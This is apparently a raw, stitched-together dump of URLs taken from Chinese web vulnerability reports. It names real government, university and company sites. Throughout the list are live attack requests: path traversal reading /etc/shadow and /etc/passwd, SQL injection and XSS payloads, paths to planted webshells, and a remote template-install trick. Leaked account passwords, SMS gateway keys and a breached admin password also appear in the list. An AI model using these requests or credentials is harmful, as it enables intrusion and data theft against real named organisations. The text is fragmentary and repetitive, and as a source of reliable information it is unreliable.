http://jmzx.xmedu.cn:9999/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1 http://58.56.128.21/sendmessage/ http://58.56.128.21/sendmessage/default3.aspx http://sswz.spb.gov.cn/logout.do http://218.200.190.100:8080/ http://218.200.190.100:8080/ZDXM/Desk.aspx可直接访问登陆后的页面 http://bbs.icpcw.com/ http://bbs.icpcw.com//config/config_global.php.bak http://114.242.111.16:8081/bsweb/login.action jdbc:oracle:thin:@192.168.1.124:1521:orcl jdbc:oracle:thin:@192.168.1.124:1521:orcl jdbc:oracle:thin:@10.200.2.3:1521:casc jdbc:oracle:thin:@10.200.2.3:1521:casc http://114.242.111.16:8081/papernew/admin/login.jsp http://114.242.111.16:8081/lybadmin/user.jsp http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_before_modpwd http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_cxdlxx http://jkfw.cpoc.cn/SysJKFW/dlxx/moddlaction_ispasswd?stuid=xxxxxxx&pwd=xxxxxx bbs.union.zhuna.cn/uc_server/admin.php webshell:http://bbs.union.zhuna.cn//config/config_ucenter.php http://diancms.com/user/other/Report.aspx?url= http://bbs.trzone.cn/gateway.php http://house.sdchina.com/loupan/index.aspx?maidian=&mianji2=&mianji1=&zxcd=&jzlb=&area=&xxly=&sq=&cid=869&sort=&ting=&seachText=&kjgd=&cx=&wylx=&wyyt=&jiage2=&cq=&jiage1=&wei= http://www.gansupost.com/bulletin/goView_BULLETIN.shtml?BULLETIN_ID=49abbeb6ed0126d80b9e http://**.**.** body.innerht.ml/pocs/chrome-xssauditor-bypass-html-import/xss.php www.yzdsb.com.cn about:blank,这个域的XSS没太大意义: mx://res/quick-access/index.htm: mx://res/notification/可以调用maxthon.program,执行任意路径的程序。 mx://res/app/%7B33CA60D6-EADC-4558-9185-2EBE14214AB9%7D/index.htm mx://res/quick-access/index.htm和mx://res/notification/等页面的protocol(mx)、host(res)、port(80)都是相同的,所以他们是同源的,符合浏览器SOP策略,我们直接通过mx://res/quick-access/index.htm就可以调用mx://res/notification/的API。 mx://res/quick-access/index.htm域名下的XSS,我们想将其构造成远程命令执行,需要完成以下几步: javascript:xxx”的首页。 about:blank。 http://www.spc.edu.hk/content.php?id=62&mid=70-103 
http://xssec.cc/v64xhF?1426782624 http://120.197.89.215/ https://github.com/pkufranky/showoff-ssh-agent-forward/blob/master/personal-statement/01_summary.md https://github.com/pkufranky/showoff-ssh-agent-forward/blob/master/ssh-agent-guide/ssh-guide/01_security.md http://s.wanda.cn http://s.wanda.cn/mw/mobile/login.html http://s.wanda.cn/UcControl/JqchartSaleMoneyCount.aspx?tabtype=XSE http://s.wanda.cn/Upload/20150320/f4ck-[%E5%94%90%E5%B1%B1%E8%B7%AF%E5%8D%97%E4%B8%87%E8%BE%BE%E5%B9%BF%E5%9C%BA-20153201296241].aspx http://182.148.112.134:8004/xilan.do?id=232784&articlesrs=02 http://comment.17k.com/loadUser.action?callback=userCallback&userId=17476593 http://gjdx.gz163.cn/admin/Login.aspx http://www.leshan-hospital.com.cn/readnews.asp?id=2103 http://59.64.79.18/info.aspx?id=622 http://59.64.79.18/login.aspx http://www.cr23g.com/zyjs.asp?id=170 http://www.piaoyou.org/case_web.htm inurl:/cms/website/04或者inurl:subcollist.jsp http://www.zygs.com/zygs/cms/website/04/template_div/subcollist.jsp?oldcid=3386 http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.hhs.com.cn/hnjl/cms/website/04/template_div/subcolists.jsp?oldcid=4750 http://218.29.75.230/hngsdc/cms/website/04/template_div/newSubCollist.jsp?oldcid=4272 http://www.hngsdc.com/hngsdc/cms/website/04/template_div/newSubCollist.jsp?oldcid=4386 http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.hnrbi.com/kcsjy/cms/website/04/templ http://sqlmap.org http://www.chinamota.com/showpro.asp?id=358 http://www.wanliyiliao.com/showpro.asp?id=1278 http://www.math-mark.com/showpro.asp?id=83 http://www.xuanlusi.com/ShowPro.asp?id=140 http://www.dongfangwangchao.com/showpro.asp?id=1417 http://jcc.bjmu.edu.cn/cgi-bin/test-cgi http://certify.yiji.com/index/index.htm http://pawn.ecitic.com/mainBusiness http://f.bj.e-health.org.cn/sso/ssoLogin_input1.action http://www.yilvcheng.com/admin.php http://mail.sh.cn/ 
http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/bea/citizenmail/NewMailSh/smmail/jsp/Action/DownFile.jsp&fileName=DownFile.jsp http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/usr/local/apache2/conf/httpd.conf&fileName=httpd.conf http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/passwd&fileName=passwd http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/etc/shadow&fileName=shadow http://mail.sh.cn/NewMailSh/smmail/jsp/Action/DownFile.jsp?file=/work/apachelogs/info.smmail.cn_access_log&fileName=info.smmail.cn_access_log www.smmail.cn_erro_log www.smmail.cn_erro_log www.eshimin.com filetype:xls http://ehelp.travelsky.com/oa_internal/chief_duty/dsdetail.jsp?dsid=888 http://ehelp.travelsky.com//oa_internal/chief_duty/dsdetail.jsp?dsid=888 http://122.119.124.11/Login.action http://mail.gjqh.com.cn/owa/auth/logon.aspx?replaceCurrent=1&url=http%3a%2f%2fmail.gjqh.com.cn%2fowa%2f http://mail.gjqh.com.cn:9090/login.jsp http://mail.gjqh.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://mail.gjqh.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/shadow http://oa.tclking.com/Login.aspx http://www.super8.com.cn/ http://222.177.118.172:8084/vmain/login.jsp http://222.177.118.172:8084/ServiceAction/com.velcro.base.DataAction?sql= http://statzhajinhua.3gforgame.com:8080/jinhua/index.php/login http://www.yidiao.net/admin/sysadmin/login http://122.11.49.249/sur/survey.php?id=3626 http://jcc.bjmu.edu.cn/ http://fxzx.bjmu.edu.cn http://yygl.bjmu.edu.cn/ http://netc.jnu.edu.cn http://jsjxfzzx.jju.edu.cn/ http://hhxy.jju.edu.cn/ http://gc.ustb.edu.cn/ http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult 
http://user.baofeng.com/user/?a=updateinfo&username=aaa&name=&sex=1&provinceId=110000&cityId=110100&birthdayStr=&birthday=&interest=25%27&intro=&edu=&edu_bgd=&vocation=&is_mar=&mar=0&province=110000&city=110100&county=110101&film_type=&film_fes=&mon_pay=&contact=哈哈哈&callback=User.changeBaseInfoResult"/ http://shop.baofeng.com/pay/pay_choose/0/0/2/?code=a%22/%3E%3Ch1%3Eaaa http://user.baofeng.com/user/?a=sendCheckMail&callback=%3Ch1%3Eaaa http://www.baofeng.com/q_YWFhJyUzQmFsZXJ0KCklM0J2YXIlMjBiJTNEJw== http://adorders.huiyan.baofeng.com/Acl/user/loginin/message/%3Ch1%3Eaaa http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://reachmax.addnewer.com/oauth/authorize.do http://www.comba-telecom.com http://www.comba-telecom.com/ckfinder/ckfinder.html http://www.comba.com.cn同样存在这个漏洞,但由于是IIS7.5无法利用 www.comba.com.cn的后台也可以登录。可以随意修改内容 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://oa6.53kf.com/lib/common/communication/bglogin.php?action=check&domain_name=10000079&flow_id=3580 http://www.ot-hs.com/index1.asp 
http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://csr.hnagroup.com/ http://csr.hnagroup.com/hna-commonweal/images/pic/commonwealuser/jspcmd1.jsp zhanghao:mixiaofei mima:mixiaofei zhanghao:hnauser mima:123456 http://www.cpic.com.cn/cpic/index.shtml?cmpid=nim_bd_000057 http://118.122.168.126:90/ http://app.hbcic.gov.cn/anquan/doc/error.asp http://app.hbcic.gov.cn/anquan/doc/MSSQL.asp http://app.hbcic.gov.cn/anquan/doc/x.asp www.utouu.com http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://gzcx.tynu.edu.cn/KFweb/admin/GenerateRegUser.aspx http://210.45.92.21/admin/GenerateRegUser.aspx http://cwc.sxufe.edu.cn/KFweb/admin/GenerateRegUser.aspx http://www.shcdkf.com/kfweb/admin/GenerateRegUser.aspx http://221.5.51.228/cjb/admin/GenerateRegUser.aspx http://cwch.ahu.edu.cn/querynetweb/admin/GenerateRegUser.aspx http://www.cqvie.com/xfcxsq/admin/GenerateRegUser.aspx http://59.72.128.44/KfWeb/admin/GenerateRegUser.aspx http://cycwc.gzife.edu.cn/kefa/admin/GenerateRegUser.aspx http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx为例: http://61.142.174.200/cwc/KFweb/admin/GenerateRegUser.aspx http://www.500mi.com/,发现存在Elasticsearch http://m.zhuna.cn/ http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=x http://m.zhuna.cn/wap/index.php/index/hotelSearch?city=x http://oa6.53kf.com/cust_workflow_edit.php?arg=p10000079_10060875&entrance=cust&left=cust&flow_id=3580&fnode_only=1&remote_call=1&sign=c16ac3dbf9b532665acef7c076070a6c3f7ca660&t=6858976974&cust_field_val=12345122%40qq.com http://ued.baidu.com/ 
http://luntan.land.tcl.com/user/Default.aspx http://luntan.land.tcl.com/admin/Include/ChannelList.aspx http://luntan.land.tcl.com/admin/index.aspx www.myzyy.com http://www.myzyy.com/backoffice/tempsys/installtmp.aspx?tname=c004&tmp=http://view.86mt.com/getfile.aspx?FileName=c004 http://view.86mt.com/getfile.aspx?FileName=c004 http://www.myzyy.com/backoffice/tempsys/installtmp.aspx?tname=c004&tmp=http://www.xxx.com/c004.zip http://www.myzyy.com/template/c004/2.aspx http://pm.haiertvbic.com/login http://www.sffda.gov.cn/news/c/?id=1110 http://v8.workyi.com/ http://v8.workyi.com/persondh/latest.aspx?key= version:2.5.130916 http://gz.jxrcrsw.com/persondh/latest.aspx?key= http://beijing.ahyylw.com/persondh/latest.aspx?key= http://nyb.shibufangcao.com/persondh/latest.aspx?key= http://www.189051.com/persondh/latest.aspx?key= http://www.e855.net/persondh/latest.aspx?key= http://www.tjkyhr.com/persondh/latest.aspx?key= http://beijing.ahyylw.com/persondh/latest.aspx?key= http://163.15.186.37 http://203.71.247.31 http://163.20.51.250 http://140.128.164.7 http://163.32.90.101 http://220.134.145.150 http://140.129.117.243 http://120.105.163.96 http://27.223.70.11/register.asp http://27.223.70.11 http://地址/PowerRecordY.aspx?Date=2015&LoopName=1.1 https://www.hushmail.com/preview/hushmail/ http://passport.liba.com/findPassword.php?step=5&uid=8155678&code=66465e6bae84800bf2e4e82369eb32dc http://test.imxiaomai.com/ http://27.223.70.28:8081/bljh/ http://5.haierabc.com/ http://www2.cmu.edu.tw/~alumni/admin/index.php http://www2.cmu.edu.tw/~alumni/upload/File/jing.php http://www.hoau.net/rczp/show_city.php http://zqb.creditease.cn http://www.aoyou.com/leyooisland.htm?refurl=http%3A%2F%2Fwww.aoyou.com%2Fshanghai http://biz.aoyou.com/ http://www.airport.gx.cn/ http://www.airport.gx.cn:8089/fckeditor/editor/dialog/fck_about.html http://58.59.137.194:8089/UserFiles/File/111/sss.jsp?o=index http://58.59.137.194:8089/UserFiles/File/111/test.jsp http://www.super8.com.cn/ 
http://allthingshair.youku.com/api/index.php?r=video/GetAccountVideoLastWeekByCategoryIdHasSpecialVideo http://allthingshair.youku.com/api/index.php?r= http://sqlmap.org http://116.112.15.30/Account/LogOn/ http://www.scup.cn/press.asp?id=353 http://shop.edu-founder.com/PageProductsList.aspx?cid=1&DpName=1 http://116.213.120.35/,弱口令admin http://gamedb.766.com/sm/site/view/hero_id/updatexml%281,concat%280x7e,%28user%28%29%29%29,0%29 http://ctd.ruc.edu.cn/newslist.php?type=2 http://gs.njfu.edu.cn/Gmis/zs/fbzsksInfolist.aspx http://202.203.225.17:8080/Gmis/zs/fbzsksInfolist.aspx http://218.75.27.177/Gmis/zs/fbzsksInfolist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsksInfolist.aspx http://101.76.99.20/Gmis/zs/fbzsksInfolist.aspx http://61.187.179.68:8080/Gmis/zs/fbzsksInfolist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsksInfolist.aspx http://211.64.205.214/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsksInfolist.aspx http://210.43.126.80:8080 http://zoo.e-tobe.com/content.php?id=19&sub=2 http://wiki.smart-tv.cn/index.php http://open.smart-tv.cn/chzk/ http://www.xscbs.com.cn/xishi/index.php?file=news&smid=14&nid=1614 http://kmchao.com/ http://www.yngaogu.com/thi.php?fid=12 http://www.labreal.cn/thi.php?fid=93 http://kmajww.com/thi.php?fid=2 http://www.cxhhhq.com/thi.php?fid=5 http://www.yncxhq.com/thi.php?fid=8 http://ynrsy.com/thi.php?fid=1 http://www.fxsqssmzw.cn/thi.php?fid=37 http://www.csiclh.com/thi.php?fid=57 http://a1811237.sn4764.gzonet.com/thi.php?fid=21 http://www.ynhengman.com/thi.php?fid=8 http://www.ynhcadv.com/thi.php?fid=30 http://www.cngooye.com/thi.php?fid=13 http://www.gyrunjia.com/thi.php?fid=41 http://www.fdkbdf.com/thi.php?fid=52 http://www.ynskzmgc.com/thi.php?fid=29 http://gaogu.gotoip4.com/thi.php?fid=10 http://www.gzqhds.com/thi.php?fid=14 http://www.大理双廊.com/thi.php?fid=26 http://kmsettle.com/thi.php?fid=6 http://ynasyl.com/thi.php?fid=12 
http://www.ynymbz.com/thi.php?fid=62 http://www.winstown.com/thi.php?fid=15 http://www.kmzzkj.com/thi.php?fid=22 http://www.xgrzrt.com/thi.php?fid=20 http://www.mufoedu.com/thi.php?fid=24 http://www.mufoedu.com/thi.php?fid=24 http://www.kmzzkj.com/thi.php?fid=22 www.dinghuaren.com http://www.chinakjzx.com/columnlist.do?ID=14 http://www.chinakjcxdb.com/columnlist.do?ID=14 http://www.zgwscy.com/columnlist.do?ID=14 http://115.47.21.161:8080/columnlist.do?ID=14 http://www.chinazwyl.com/ http://www.vimigou.com/home_login.action etkqqda.gov.cn/admin/default.asp http://m.88.com.cn http://api.88.com.cn http://bidding.ztesoft.com/ http://bidding.ztesoft.com:80/ http://kmchao.com/ http://www.yngaogu.com/thi_details.php?id=285 http://www.cxhhhq.com/thi_details.php?id=129 http://www.labreal.cn/thi_details.php?id=23 http://www.jdzs666.com/thi_details.php?id=97 http://www.yn-led.com/thi_details.php?id=342 http://www.ynyasheng.com/thi_details.php?id=243 http://www.yncxhq.com/thi_details.php?id=138 http://ynrsy.com/thi_details.php?id=12 http://www.kmajww.com/thi_details.php?id=32 http://www.ynhcadv.com/thi_details.php?id=161 http://www.gzqhds.com/thi_details.php?id=84 http://www.ynznjd.com/thi_details.php?id=43 http://www.yishengcao.com/thi_details.php?id=19 http://www.fxsqssmzw.cn/thi_details.php?id=74 http://www.kmyrdn.com/thi_details.php?id=29 http://www.winstown.com/thi_details.php?id=6 http://a1811237.sn4764.gzonet.com/thi_details.php?id=482 http://www.kmxycm.com/thi_details.php?id=47 http://www.ynhufeng.com/thi_details.php?id=303 http://ynwms.com/thi_details.php?id=105 http://www.csiclh.com/thi_details.php?id=110 http://yishengcao.gotoip55.com/thi_details.php?id=50 http://www.ynrjnk.com/thi_details.php?id=110 http://www.csiclh.com/thi_details.php?id=110 http://www.ynrjnk.com/thi_details.php?id=110 XSS1:http://www.ynrjnk.com/liuyan.php http://www.chinakjzx.com/author/check.ashx?name= http://www.chinakjcxdb.com/author/check.ashx?name= 
http://www.zgwscy.com/author/check.ashx?name= http://115.47.21.161:8080/author/check.ashx?name= http://www.chinazwyl.com/author/check.ashx?name= http://gs.njfu.edu.cn/Gmis/xwyygl/xwyycjlr.aspx http://202.203.225.17:8080/Gmis/xwyygl/xwyycjlr.aspx http://218.75.27.177/Gmis/xwyygl/xwyycjlr.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xwyygl/xwyycjlr.aspx http://101.76.99.20/Gmis/xwyygl/xwyycjlr.aspx http://61.187.179.68:8080/Gmis/xwyygl/xwyycjlr.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjlr.aspx http://210.43.126.80:8080 http://mhz.pw/game/SOP/01.php http://gs.njfu.edu.cn/Gmis/xw/xwzInfoListcp.aspx http://202.203.225.17:8080/Gmis/xw/xwzInfoListcp.aspx http://218.75.27.177/Gmis/xw/xwzInfoListcp.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwzInfoListcp.aspx http://101.76.99.20/Gmis/xw/xwzInfoListcp.aspx http://61.187.179.68:8080/Gmis/xw/xwzInfoListcp.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwzInfoListcp.aspx http://210.43.126.80:8080/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214/Gmis/xw/xwzInfoListcp.aspx http://211.64.205.214 www.07073.com http://phpems.net http://phpems.net/2014 http://211.138.248.91:8018/Article/View1.aspx?Class=010301&ID=20 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.vcooline.com/ 
https://github.com/407435208/wsite/blob/56cf9633072df591fffef0485ecb0fa6787168c5/wsite-mvc/src/main/resources/WEB-INF/config/applicationcontext-mvc.xml https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database.properties https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database_prod.properties https://github.com/407435208/wsite/blob/7ca0e39c0399ce7161217bcaa54b2fe3ddce9413/wsite-dal/target/classes/WEB-INF/config/database_staging.properties http://www.gzsadr.gov.cn/showinfo.asp?id=558 http://www.zhong-bei.com/admin/index.asp http://scc.cufe.edu.cn/jyw_zc/detail.jsp?seq=2310 http://www.goodnews.org.tw/content.php?id=51092 http://kmchao.com/ http://www.ynrjnk.com/sec_details.php?id=149 http://ynwms.com/sec_details.php?id=339 http://www.ynymbz.com/sec_details.php?id=614 http://www.省肥灯水溶肥.com/sec_details.php?id=164 http://www.ynmsksw.com/sec_details.php?id=685 http://www.yncgwh.com/sec_details.php?id=14 http://www.ynyyky.com/sec_details.php?id=24 http://ynjzzsdlmzg.gotoip55.com/sec_details.php?id=277 http://www.ynyyky.com/sec_details.php?id=246 http://www.娇俏水溶肥.com/sec_details.php?id=27 http://www.hefuedu.cn/sec_details.php?id=108 http://ynwms.com/sec_details.php?id=309 http://www.hefuedu.cn/sec_details.php?id=116 http://www.ynrjnk.com/sec.php?oid=2 http://www.ynymbz.com/sec.php?oid=2 http://www.ynmsksw.com/sec.php?tid=40 http://www.yncgwh.com/sec.php?oid=3 http://www.ynyyky.com/sec.php?oid=3 http://www.hefuedu.cn/sec.php?oid=3 http://ynwms.com/sec_details.php?id=339 http://www.hefuedu.cn/sec.php?oid=3 http://www.dongfeng.net/dfnews_searchMoreNews.do http://gs.njfu.edu.cn/Gmis/zs/fbzsjzInfoalist.aspx http://202.203.225.17:8080/Gmis/zs/fbzsjzInfoalist.aspx http://218.75.27.177/Gmis/zs/fbzsjzInfoalist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsjzInfoalist.aspx http://101.76.99.20/Gmis/zs/fbzsjzInfoalist.aspx 
http://61.187.179.68:8080/Gmis/zs/fbzsjzInfoalist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsjzInfoalist.aspx http://210.43.126.80:8080/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214/Gmis/zs/fbzsjzInfoalist.aspx http://211.64.205.214 http://www.jsbbzy.com/manage/basepage/login_init.action http://www.jsbbzy.com/bak.jsp http://112.124.55.6/SXHB/ http://112.124.55.6/SXHB/1.txt http://112.124.55.6/ www.gksq.net,得到管理员email:wuyinglai@163.com,查社工库得到密码:777wyl,登陆wordpress后台,随便插件写个一句话, http://www.dlinfo.gov.cn/kjxxw.php?id=110490 http://gs.njfu.edu.cn/Gmis/xwyygl/xwyycjcx.aspx http://202.203.225.17:8080/Gmis/xwyygl/xwyycjcx.aspx http://218.75.27.177/Gmis/xwyygl/xwyycjcx.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xwyygl/xwyycjcx.aspx http://101.76.99.20/Gmis/xwyygl/xwyycjcx.aspx http://61.187.179.68:8080/Gmis/xwyygl/xwyycjcx.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080/Gmis/xwyygl/xwyycjcx.aspx http://210.43.126.80:8080 http://121.18.73.204:7100 http://xgzljtvip.com/ http://xgzljtvip.com/manage/basepage/merchantsLogin_doInit.action http://xgzljtvip.com/bak.jsp http://202.98.57.28:8088/ http://www.cbbtv.com/showredirect.do?type=3 http://www.nbfwz.cn/index/index.do http://itunes.apple.com/cn/app/nei-han-duan-zi/id517166184 http://www.ztesoft.com:18085/sq/emailcheck.aspx http://www.ztesoft.com:18085/ www.ztesoft.com:18085 http://open.lenovo.com/data/multiDimensionAction.do?method=getTrendData&reportName=MultiDimensionData http://si.buaa.edu.cn/download.php?file_name=../../../../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././passwd http://wallpaper-sogou.open.moxiu.net/ http://wallpaper-sogou.open.moxiu.net/index.php?do=Album.Show&id=20170 http://apt.feng.com/4001133 v2.php/User/cancelFollow http://www.cup.edu.cn/geosci/,http://www.cup.edu.cn/oil/等学院网站上的调剂复试名名单),代入其中即可得到 
http://gmis.cup.edu.cn/zsgl/fsgl/tjxxView.aspx?bmh=114145111640657 http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141011-336.txt http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141147-926.txt v.cn/templet/yy***** http://www.hanmasoft.cn/ http://jy.qhnu.edu.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=8 http://zsjy.hnmeida.com.cn/job/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jyb.cdutetc.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jyzd.lmu.cn/index_module.php?module_name=department_allinfo&action=0&dep_id=9 http://jy.hnrpc.com/index_module.php?module_name=department_allinfo&action=0&dep_id=7 http://www.yf1668.com/ http://112.124.41.23:38888/ http://112.124.41.23:38888/SystemManage/BuMenInfo.aspx?Type=&DirID=0 http://112.124.41.23:38888/GongGao/GongGao.aspx?Type=a http://112.124.41.23:38888/WorkFlow/PublicSealLog.aspx?Type=c http://112.124.41.23:38888/WorkFlow/PublicSealL http://sqlmap.org http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp inurl:ws2004/Model/ http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 http://ac.cqupt.edu.cn http://ac.cqupt.edu.cn/gclx/nav.php?cat_id=50 http://ac.cqupt.edu.cn/gclx//admin/fckeditor/editor/filemanager/connectors/uploadtest.html http://ac.cqupt.edu.cn/gclx/admin/ http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1369642461_conf.php http://www.hanmasoft.cn/ query:SELECT Error:You http://jyb.cdutetc.cn/index_major_detail.php?btab=1&major_id=69&indexstyle=1 http://jyw.hftc.edu.cn/index_major_detail.php?btab=1&major_id=7466&indexstyle=1 http://jy.hnrpc.com/index_major_detail.php?btab=1&major_id=57&indexstyle=1 
http://218.75.196.222/index_major_detail.php?btab=1&major_id=56&indexstyle=1 http://110.189.108.6/index_major_detail.php?btab=1&major_id=115&indexstyle=1 http://58.47.177.161/job/index_major_detail.php?btab=1&major_id=51&indexstyle=0 http://hqjt.ncist.edu.cn/news_eg.php?NEWS_ID=502 http://202.97.223.148:8090/ http://120.42.37.93:10003/dzsbxz/phone-xmsb/download.html http://218.104.135.77:9010/mMSW/mobile/sbjf/querySbjfxx.html?maxRows=20&startDate=201501&endDate=201503¤tPage=1&xzdm00=1&zmlx00=01&ylz_token=*马*赛*克* http://218.104.135.77:9010/mMSW/mobile/yibao/queryYdfylb.html?maxRows=10&qsrqi=20130320&jzrqi=20150320¤tPage=1&ylz_token=*马*赛*克* http://zhlm.cpoc.cn/houtai_admin/login!shengcms.action?pkid=tszsyonghu http://www.iooqoo.com/ http://member.iooqoo.com/validate2.html http://www.looqoo.com.cn/ http://member.looqoo.com.cn/validate2.html http://www.boojoo.com.cn/ http://member.boojoo.com.cn/validate2.html http://www.4-3.com.cn/about/contact.html http://www.cocopex.com/www.qudao.biz/about/contact.html http://www.taideng.biz/about/contact.html http://www.oooggg.com/about/contact.html http://www.z-china.com/about/contact.html http://www.rooloo.cn/about/contact.html http://www.h-c.com.cn/about/contact.html http://www.m-i.cn/about/contact.html http://www.eooaoo.com/about/contact.html http://www.china1f.com/about/contact.html http://www.ioomoo.com/about/contact.html http://www.powercn.net/about/contact.html http://www.hhhiii.com/about/contact.html http://www.dianshi.biz/about/contact.html http://www.n-g.com.cn/about/contact.html http://www.rooqoo.com.cn/about/contact.html http://www.fffrrr.com.cn/about/contact.html http://www.c-yl.com/about/contact.html http://www.mooioo.cn/about/contact.html http://www.caiyin.net.cn/about/contact.html http://www.stonew.com/about/contact.html http://www.china-waste.com/about/contact.html http://www.toozoo.com.cn/about/contact.html http://www.shoutao.biz/about/contact.html http://www.y-y.com.cn/about/contact.html 
http://www.fuhefei.biz/about/contact.html http://www.xiaoyouxi.biz/about/contact.html http://www.s-u.cn/about/contact.html http://www.mugui.com.cn/about/contact.html http://www.diandongche.biz/about/contact.html http://www.cizhuan.biz/about/contact.html http://www.zhineng.biz/about/contact.html http://www.toolchina.net/about/contact.html http://nbsw.yundasys.com/wdkhxx/ajax.php http://gw.apabi.com/ https://github.com/fangxuezheng/doc http://59.51.45.225:82/Newfile.txt http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-NBTRS&password=194342 http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-NBTRT&password=198165 http://219.239.91.112/sdkproxy/querybalance.action?cdkey=3SDK-EMY-0130-JFXNO&password=569244 http://yzd.hyhhgroup.com/admin/menu.php http://app.finance.ifeng.com/money/insurance_rs_detail.php?qtype=id&query=1053 http://gw.apabi.com/ http://ebook.nwu.edu.cn/AddMyFavourite.asp?lang=gb&DocID=1 http://dlib.gsjtxy.edu.cn/dlib/AddMyFavourite.asp?lang=gb&DocID=1 http://book.sdjnlib.net:81/AddMyFavourite.asp?lang=gb&DocID=1 